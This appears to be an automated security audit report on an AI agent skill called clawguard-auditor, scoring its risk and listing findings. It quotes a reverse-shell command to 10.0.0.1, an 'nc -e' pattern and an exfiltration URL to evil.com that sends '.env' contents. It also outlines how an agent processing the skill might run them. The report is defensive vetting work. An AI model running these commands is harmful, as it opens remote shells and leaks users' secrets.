Skill Trust Decision
clawguard-auditor
Security auditor skill contains embedded reverse shell patterns (nc -e, bash -i >& /dev/tcp) and data exfiltration examples (evil.com/?data=$(cat .env)) within documentation. No executable code files present, but the skill specification describes extensive capabilities (filesystem:WRITE, network:READ, shell:ADMIN) without implementation.
Most direct threat evidence
01
Skill masquerades as legitimate security auditor Entry · SKILL.md
02
Documentation embeds reverse shell patterns as 'detection examples' weaponization · SKILL.md
03
AI agent extracts and interprets embedded patterns during skill processing exploitation · SKILL.md
Why this conclusion was reached
2/4 dimensions flagged Pass
Declared vs actual capability
Declared resources and inferred behavior are broadly aligned.
Block
Hidden execution and egress
2 high-risk artifacts or egress signals were extracted.
Block
Attack chain and severe findings
The report includes 4 attack-chain steps and 1 severe findings.
Review
Dependencies and supply chain hygiene
Dependency information is incomplete, so supply-chain confidence stays limited.
Attack Chain
01
Skill masquerades as legitimate security auditor
Entry · SKILL.md:1
02
Documentation embeds reverse shell patterns as 'detection examples'
weaponization · SKILL.md:55
03
AI agent extracts and interprets embedded patterns during skill processing
exploitation · SKILL.md:55
04
Potential execution of nc -e /dev/tcp or bash reverse shell commands
Impact · SKILL.md:55
What drove the risk score up
Embedded reverse shell patterns +20
SKILL.md:55 contains 'nc -e' and 'bash -i >& /dev/tcp' strings embedded in documentation
Data exfiltration example URL +10
SKILL.md:99 contains 'http://evil.com/?data=$(cat .env)' as detection example
Capabilities mismatch +8
Skill describes extensive capabilities (WRITE, ADMIN, NET_EGRESS) for documentation-only implementation
No executable files +-5
Absence of scripts/ directory, requirements.txt, or any code files reduces practical risk
Benign context +-3
Patterns appear in 'SAST Red Flag Hunt' section as detection examples
Documentation artifacts +-8
All files are Markdown/JSON with no executable code present
Most important evidence
High
Embedded reverse shell command patterns
SKILL.md contains literal strings 'nc -e' and 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' at line 55 within a list of 'red flags to detect'. While in context these are examples, they represent dangerous patterns that could be extracted by prompt injection or interpreted by a compromised AI agent.
SKILL.md:55 Remove or escape dangerous patterns in documentation. Use generic descriptions like 'network connection backdoors' instead of literal command syntax.
Medium
Data exfiltration pattern example
SKILL.md contains 'http://evil.com/?data=$(cat .env)' as an example of what the DLP engine should block. This embeds a real exfiltration technique as instructional content.
SKILL.md:99 Replace with generic description: 'URL parameter data exfiltration attempts'.
Medium
Capabilities exceed implementation
The skill describes requiring CAP_FS_WRITE, CAP_NET_EGRESS, CAP_SYS_EXEC, and CAP_FS_READ_SENSITIVE capabilities, but no executable code files exist. This creates a mismatch between declared purpose and actual functionality.
SKILL.md:25 If this is documentation-only, declare NONE for all resource levels.
Low
Documentation-only implementation
All files are Markdown or JSON with no scripts/, requirements.txt, package.json, or any executable code. The skill is a specification without implementation.
SKILL.md:1 Verify if actual implementation files exist or are expected.
Declared capability vs actual capability
Filesystem Pass
Declared WRITE
→ Inferred NONE
SKILL.md describes CAP_FS_WRITE capability but no code exists to exercise it Network Pass
Declared READ
→ Inferred NONE
SKILL.md describes NET_EGRESS token but no network code present Shell Pass
Declared ADMIN
→ Inferred NONE
No shell scripts or subprocess calls in any file Environment Pass
Declared READ
→ Inferred NONE
Mentions credential access but no code implements it Suspicious artifacts and egress
Critical Dangerous Command
nc -e SKILL.md:55
Critical Dangerous Command
bash -i >& SKILL.md:55
Medium External URL
http://evil.com/?data=$(cat SKILL.md:99
Dependencies and supply chain
There are no structured dependency warnings.
File composition
3 files · 271 lines
Markdown 2 files · 263 linesJSON 1 files · 8 lines
Files of concern · 1
SKILL.md Embedded reverse shell command patterns · Data exfiltration pattern example · Capabilities exceed implementation · Documentation-only implementation · nc -e · bash -i >& · http://evil.com/?data=$(cat
Other files · README.md · _meta.json
Security positives
No executable scripts or binary files present
No actual network connections or data exfiltration attempted
No credential harvesting code implemented
No base64-encoded payloads or obfuscated code
Patterns appear in documented 'detection examples' context rather than as instructions